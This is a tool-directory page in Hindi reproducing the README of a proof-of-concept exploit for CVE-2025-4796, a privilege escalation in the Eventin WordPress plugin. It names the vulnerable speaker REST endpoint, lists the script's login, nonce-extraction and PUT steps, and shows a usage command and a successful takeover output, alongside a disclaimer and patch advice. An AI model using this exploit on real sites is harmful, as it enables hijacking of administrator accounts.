Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - प्रमाणित (योगदानकर्ता+) उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-4796
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - प्रमाणित (योगदानकर्ता+) उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4796

Eventin <= 4.0.34 - उपयोगकर्ता ईमेल परिवर्तन/खाता अधिग्रहण के माध्यम से प्रमाणित (Contributor+) विशेषाधिकार वृद्धि

🛡️ Eventin <= 4.0.34 - प्रमाणित (Contributor+) विशेषाधिकार वृद्धि (CVE-2025-4796)

📌 अवलोकन

यह रिपॉजिटरी Eventin WordPress प्लगइन (<= 4.0.34) में एक विशेषाधिकार वृद्धि भेद्यता का दस्तावेजीकरण करती है, जो Contributor+ क्षमताओं वाले प्रमाणित उपयोगकर्ता को प्लगइन के स्पीकर अपडेट API के माध्यम से किसी भी उपयोगकर्ता के ईमेल पते बदलने की अनुमति देती है। किसी व्यवस्थापक का ईमेल बदलकर, एक हमलावर पासवर्ड रीसेट ट्रिगर कर सकता है और खाता अधिग्रहण प्राप्त कर सकता है।

  • संवेदनशील घटक: Eventin WordPress प्लगइन (Eventin\Speaker\Api\SpeakerController::update_item)

  • प्रभावित संस्करण: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (उच्च)

  • सक्रिय इंस्टॉलेशन: 10,000+

⚠️ भेद्यता विवरण

Eventin स्पीकर/उपयोगकर्ता विवरण (विशेष रूप से ईमेल) अपडेट करने से पहले कॉलर की पहचान या क्षमता को ठीक से सत्यापित नहीं करता है। एक हमलावर जो contributor (या उच्चतर) के रूप में प्रमाणित है, प्लगइन के REST एंडपॉइंट का उपयोग करके अन्य उपयोगकर्ताओं — जिनमें व्यवस्थापक भी शामिल हैं — का ईमेल पता बदल सकता है:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

एक बार ईमेल को हमलावर-नियंत्रित पते पर बदल दिए जाने के बाद, खाते पर कब्जा करने के लिए मानक WordPress पासवर्ड रीसेट प्रक्रिया का उपयोग किया जा सकता है।

🧰 स्क्रिप्ट (PoC)

फ़ाइल नाम: CVE-2025-4796.py

यह स्क्रिप्ट निम्नलिखित चरणों को स्वचालित करती है:

  1. प्रदान किए गए क्रेडेंशियल का उपयोग करके लक्षित WordPress साइट में लॉग इन करें।
  2. आवश्यक X-WP-Nonce निकालें
  3. स्पीकर का ईमेल अपडेट करने के लिए /wp-json/eventin/v2/speakers/<speaker_id> पर एक PUT अनुरोध भेजें।
  4. JSON प्रतिक्रिया और एक पेशेवर सफलता संदेश प्रिंट और प्रारूपित करें।

आवश्यकताएँ:

  • Python 3.8+
  • requests

स्थापना:

root@kitploit:~
pip install requests

🚀 उपयोग

स्क्रिप्ट को कमांड लाइन से चलाएँ:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

स्क्रिप्ट सहायता दिखाएँ:

root@kitploit:~
python CVE-2025-4796.py -h

📝 CLI विकल्प (सहायता)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ सफल आउटपुट का उदाहरण

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ जिम्मेदार प्रकटीकरण और अस्वीकरण

  • यह रिपॉजिटरी सुरक्षा अनुसंधान, परीक्षण और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है।
  • इन तकनीकों का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है।
  • भेद्यताओं का अनधिकृत शोषण अवैध और अनैतिक है।
  • यदि आप एक साइट स्वामी हैं और मानते हैं कि आप संवेदनशील हैं, तो Eventin को नवीनतम संस्करण में अपडेट करें या तुरंत विक्रेता पैच लागू करें।
  • इस कोड का उपयोग केवल अधिकृत वातावरण में करें (प्रयोगशाला, क्लाइंट-अनुमोदित पेन टेस्ट, या स्पष्ट अनुमति के साथ)।

🧾 स्क्रिप्ट क्या करती है (संक्षिप्त)

  • इनपुट (URL, ईमेल) सत्यापित करता है और URL स्कीमा को सामान्यीकृत करता है।
  • SSL चेतावनियाँ अक्षम करता है (वैकल्पिक; स्व-हस्ताक्षरित डेव इंस्टेंस के विरुद्ध परीक्षण का समर्थन करने के लिए उपयोग किया जाता है)।
  • प्रदान किए गए WP क्रेडेंशियल का उपयोग करके लॉग इन करता है और कुकीज़ के माध्यम से लॉगिन सत्यापित करता है।
  • एडमिन पृष्ठ से X-WP-Nonce प्राप्त करता है।
  • स्पीकर का ईमेल अपडेट करने के लिए एक प्रमाणित PUT अनुरोध भेजता है।
  • प्रारूपित JSON प्रतिक्रिया और एक अंतिम मानव-पठनीय सफलता सारांश प्रिंट करता है।

👤 श्रेय

द्वारा: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

टूल डाउनलोड करें